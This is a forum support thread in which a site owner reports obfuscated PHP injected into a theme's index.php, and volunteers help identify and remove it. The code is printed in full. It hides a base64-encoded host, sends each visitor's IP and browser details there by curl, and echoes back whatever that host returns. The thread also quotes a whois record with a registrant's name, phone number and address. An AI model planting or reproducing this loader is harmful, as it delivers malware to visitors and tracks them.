• Welcome to Simple Machines Community Forum. Please login or sign up.

Obsifucated Code

Started by XHIBIT911, June 29, 2012, 04:21:54 PM

Previous topic - Next topic

XHIBIT911

June 29, 2012, 04:21:54 PM Last Edit: June 29, 2012, 04:39:04 PM by XHIBIT911
I found this code in my index.php.  Random people had been saying my site had some type of virus and this is after I had scanned on about 9 website checkers. It happens randomly and only AVG, Nortons and another security suite can detect it.

// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }



So the other day when I went to Base64Decode : http://www.base64decode.org/

I entered the string that was in the code below:
( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')

The URL it decoded was this: http://adveconfirm.com/stat/stat.php

I need to know is it safe to find and remove all of this code from any files its located in ?
or just how much of this code needs to go ?

// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

busterone

I am not a developer, but I don't think that code is part of SMF. It either came from a unapproved mod that you installed or you have been hacked. The url that the base64 code points to is a reported attack page. That could very well be where I got the "security scan" fake antivirus malware when I visited your site a few days ago. 

XHIBIT911

EXACTLY !

And I when I did a whois check on that site theyre hella shady.
As in very very very shady.
I'll post more about them in a sec...but how much of that code can i remove without destroying my site ?

XHIBIT911

And this is something I discovered about the website that is the cause of the malware and was base64'd on my website.


http://www.dslreports.com/forum/r25294235-Can-someone-check-out-this-site-


After doing a google serach and a whois I'm 1000% certain that this is where it stems from because thats where the code after its debugged tried to open. Here are Google results about the website

https://www.google.com/#hl=en&gs_nf=1&tok=qvGXr_ZufaVukF2eBZMuHw&cp=15&gs_id=6j&xhr=t&q=adveconfirm.com&pf=p&safe=off&output=search&sclient=psy-ab&oq=adveconfirm.com&gs_l=&pbx=1&fp=1&biw=1024&bih=593&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&cad=b


Notice how many server and other changes this domain has had in the last year, like theyre trying to cover their tracks.

http://whois.domaintools.com/adveconfirm.com

busterone

Upon just a glace, none of that is SMF code. I just searched a fresh copy of index.php and none of that is in there. It may be from a mod that you have installed, or as I said, you have been hacked. If it is from a mod, uninstall the mod and delete all of that code. If not, delete it anyway.
To be safe, it may even be a better idea to search all your files for any other files that are NOT part of a SMF install. They could be a way to get in to your site.

XHIBIT911

Yeah thats what i was doing, but its so many damn files it could take weeks.

But where do I start and end with that code ?
If I remove to much or too less I can break my forum. I need to know the exact start and stop point

busterone

The easiest way that I know is to get a copy of notepad++ It is free. Download a copy of your index.php and open it with notepad++, then open a clean copy of index.php from the upgrade or install archive. Notepad++ has a file compare feature and will highlight the differences between the two files.

Another option is to upload a fresh copy of SMF files to replace the ones on the server, but then you would also have to reinstall all your modifications afterwards.

XHIBIT911

Youre the MAN !...I'm on it like maggots on a corpse...brb

busterone


XHIBIT911

Ok roadblock..where can i find a clean index.php to download again ?

Colin

"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

XHIBIT911

yeah thanks i found it...now I'm just trying to get it into the app to compare

Colin

If you have trouble you can attach it and we can take a look as well. Here is an easy tutorial though: http://www.davidtan.org/how-to-compare-two-text-files-using-notepad-plus/
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

XHIBIT911

yeah i forgot I had to extract the damn thing...Im blonde today I gues...LOL

But its quite a bit of code and I do have so many mods I dont have a clue where its from other than perhaps that spider tracker.


XHIBIT911

Here's more information on that website


AdvEConfirm.com Whois Record


   

Registrar History:
1 registrar
NS History: 4 changes on 5 unique name servers over 0 year.
IP History: 10 changes on 11 unique IP addresses over 0 years.
Whois History: 23 records have been archived since 2012-02-14 .
Dedicated Hosting: adveconfirm.com is hosted on a dedicated server.

Registrant Contact:
   NA
   Vadim Ivanov
   +74967164758 fax: +74967164758
   Ul. Centralnaya, dom 6, kv. 38
   Dubna Moscovskaya oblast 141983
   ru

Administrative Contact:
   Vadim Ivanov
   +74967164758 fax: +74967164758
   Ul. Centralnaya, dom 6, kv. 38
   Dubna Moscovskaya oblast 141983

busterone

Ok, the index.php you had infected was from your /Themes directory, not the main index.php.
Use the attached one here to replace the one in your /Themes/ directory

There still may be a security exploit somewhere on your site for them to get access originally. This will stop the base64 stuff though.


XHIBIT911

Yeah I know...thats where the code was located in my themes directory.  or did I upload two seperate index.php's altogether ? GRRRR

XHIBIT911

Just to make sure I sent the correct two again

The index(onsite).php is the one currently in online that I found the code in my themes directory index.

The second one is a fresh uninstalled index(fresh).php

busterone

Yep, the fresh copy is the same as the one I attached above, and the onsite copy has been altered by an outside source. Go ahead and replace the onsite file with the fresh copy to eliminate the base64 exploit. Then, I would look through all your files for any more base64 encoded stuff inserted. Also look for odd named php files in your forum such as 100001.php etc. They got in somehow.

If you have any other scripts installed in your webspace, there could be a vulnerability there also. It may be a good idea to get your host involved as well in the event there is a server side weakness on their part.

XHIBIT911

New fresh index.php installed and I scanned it right now and avira didnt list the black hole exploit this time but shows the old 30 day report so I still dont know if that got it. can someone who has AVG security installed on their pc check by going to my site ?

http://www.pshomesource.com

busterone

I took a chance and went to your site. (I was a bit hesitant considering a few days ago  :D ) Nod32 gave no warnings and I was able to browse the site with no issues.  I input your url into several online site scanners first and it was found clean by them all.
You appear to be ok for now, but as I said earlier, I would be concerned about how it got there. If the hole isn't closed, it can happen again.

XHIBIT911

WHOOOO HOOO...I owe you a refreshingly cold alcoholic beverage of your choice !..You're the Maaaaayaaaaaaaaaaaann !

Also yes this weekend I plan to go thru all the files and look for any more anomolies and identify and correct as needed.
Thanks so much once again

busterone

Quite welcome. Best of luck with your forum.   :)
I am marking this topic solved. If you need to reopen it, you can always mark it unsolved using the button on the bottom left.

Advertisement: